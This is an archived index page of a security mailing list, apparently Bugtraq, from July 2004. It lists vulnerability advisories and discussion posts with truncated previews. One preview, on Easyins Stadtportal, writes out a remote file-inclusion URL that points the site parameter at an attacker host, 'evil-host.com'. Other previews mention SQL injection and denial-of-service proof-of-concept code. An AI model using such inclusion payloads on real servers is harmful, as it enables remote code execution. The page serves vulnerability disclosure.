|
|
Colapse all |
Post message
[ GLSA 200407-20 ] Subversion: Vulnerability in mod_authz_svn 2004-07-26 Joshua J. Berry (condordes gentoo org) CVS woes: .cvspass 2004-07-26 Chiaki (ishikawa yk rim or jp) The file revision control system, CVS, stores often used server's password in users .cvspass file. (When we use pserver mode to set up a central repository and access it from remote workstations, that is.) The password is "lightly scramblled" for accidental disclosure to casual reader, but descramb [ more ] [ reply ] NucleusCMS 3.01 SQL Injection Vulnerability 2004-07-25 acidbits hotmail com #!/usr/bin/php <? // Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept // By aCiDBiTS acidbits (at) hotmail (dot) com [email concealed] 24-July-2004 // // Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application. // // This Proof of Concept dumps the username and M [ more ] [ reply ] ASPRunner Multiple Vulnerabilities 2004-07-26 Ferruh Mavituna (ferruh mavituna com) ------------------------------------------------------ ASPRunner Multiple Vulnerabilities ------------------------------------------------------ Online URL : http://ferruh.mavituna.com/article/?574 1) SQL Injection; Severity : Moderatly Critical 2) Information Disclosure; Severity : Low Critical [ more ] [ reply ] QUESTION 2004-07-26 Alex Mega (korund hotmail com) What is the essence of MS Word bug Microsoft Security Bulletin MS03-035(Flaw in Microsoft Word Could Enable Macros to Run Automatically(827653) What Word component exactly is vulnerable? There are no details of bug nature, just general info. Does someone know P.O.C. exploit explaining this macro [ more ] [ reply ] [ GLSA 200407-19 ] Pavuk: Digest authentication helper buffer overflow 2004-07-26 Kurt Lieber (klieber gentoo org) Easyins Stadtportal 2004-07-24 Francisco Alisson (dominusvis click21 com br) Easyins Stadtportal v4 and prior seems to be vulnerable to a code inclusion in index.php http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://ww w.evil-host.com If anybody could explain it better than me, do it :) I'm not a security master, i'm just trying to learn about it : [ more ] [ reply ] MS SMS DOS Proof-of-concept code and Snort sig 2004-07-24 wang readyresponse org ##################################################################### Advisory Name : Microsoft Systems Management Server Remote Denial Of Service Vulnerability Release Date : 22 July, 2004 Application : Microsoft Systems Management Server (SMS) Author : MacDefender / SRR Project Group of [ more ] [ reply ] eSeSIX Thintune thin client multiple vulnerabilities 2004-07-24 Loss, Dirk (Dirk Loss it-consult net) eSeSIX Thintune thin client multiple vulnerabilities IT-Consult, 2004-07-24 Background - -------- Thintune is a series of thin client appliances sold by eSeSIX GmbH, Germany. They offer ICA, RDP, X11 and SSH support based on a customized Linux platform. See http://www.thintune.com for details. [ more ] [ reply ] EasyWeb FileManager Directory Traversal 2004-07-24 sullo cirt net (1 replies) Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.php Description: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. Systems Affected: EasyWeb FileManager 1.0 RC-1 Technical De [ more ] [ reply ] LNSA-#2004-0016: Multiple problems in Ethereal 0.10.4 (Jul, 23 2004) 2004-07-23 Vincenzo Ciaglia (ciaglia netwosix org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ************************************************************************ ************ Netwosix Linux Security Advisory #2004-0016 <http://www.netwosix.org> - ------------------------------------------------------------------------ ----------- Package name [ more ] [ reply ] [security bulletin] SSRT4773 HP-UX xfs and stmkfont remote unauthorized access 2004-07-23 Boren, Rich (SSRT) (rich boren hp com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 HP SECURITY BULLETIN HPSBUX01061 REVISION: 0 TITLE: SSRT4773 rev.0 HP-UX xfs and stmkfont remote unauthorized access NOTICE: There are no restrictions for distribution of this Bulletin provided that it remains complete and intact. The informat [ more ] [ reply ] FW: [Full-Disclosure] Progress and Challenges 2004-07-23 {tonyFelice} (tony breckcomm com) This may be of interest to the list. -----Original Message----- From: full-disclosure-admin (at) lists.netsys (dot) com [email concealed] [mailto:full-disclosure-admin (at) lists.netsys (dot) com [email concealed]] On Behalf Of John Dowling Sent: Friday, July 23, 2004 10:06 AM To: full-disclosure (at) lists.netsys (dot) com [email concealed] Subject: [Full-Disclosure] Progress and Ch [ more ] [ reply ] APC Security Advisory ? Denial of Service Vulnerability with PowerChuteBusinessEdition 2004-07-21 security advisory apcc com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APC Security Advisory ? Denial of Service Vulnerability with PowerChute Business Edition Problem Summary A non-privileged user could cause a denial of service attack on PowerChute Business Edition servers and agents, preventing authorized us [ more ] [ reply ] LNSA-#2004-0015: buffer overflow in samba (Jul, 23 2004) 2004-07-23 Vincenzo Ciaglia (ciaglia netwosix org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ************************************************************************ ************ Netwosix Linux Security Advisory #2004-0015 <http://www.netwosix.org> - ------------------------------------------------------------------------ ----------- Package name [ more ] [ reply ] eSafe: Could this be exploited? 2004-07-23 Hugo van der Kooij (hvdkooij vanderkooij org) (3 replies) Hi, I had a bit of a chat with Aladdin support regarding the odd results I had with their network virusscanner (aka: eSafe). (see also: http://www.ealaddin.com/esafe/default.asp) Both as NitroEngine or CVP server they will push as much of 80% to the end-user before they stop a virus. Then they rel [ more ] [ reply ] Re: eSafe: Could this be exploited? 2004-07-23 Oliver (at) greyhat (dot) de [email concealed] (Oliver greyhat de) OpenServer 5.0.7 : Mozilla Multiple issues 2004-07-22 please_reply_to_security sco com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ________________________________________________________________________ ______ SCO Security Advisory Subject: OpenServer 5.0.7 : Mozilla Multiple issues Advisory number: SCOSA-2004.8 Issue date: 2004 July 20 Cross reference: sr889065 fz528708 [ more ] [ reply ] mi2g attacks "so-called" security sites 2004-07-23 Rob Rosenberger (Rob Vmyths com) mi2g attacked a number of "so-called" security sites in a 20 July press release. mi2g identified by name the following sites: SecurityFocus, Insecure, Neohapsis, NetSys, e2kSecurity, Der Keiler, gossamer-threads, C4I, VulnWatch, and Landfield. Vmyths will slam mi2g in an upcoming column -- because [ more ] [ reply ] |
|
Privacy Statement |
Gentoo Linux Security Advisory GLSA 200407-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
[ more ] [ reply ]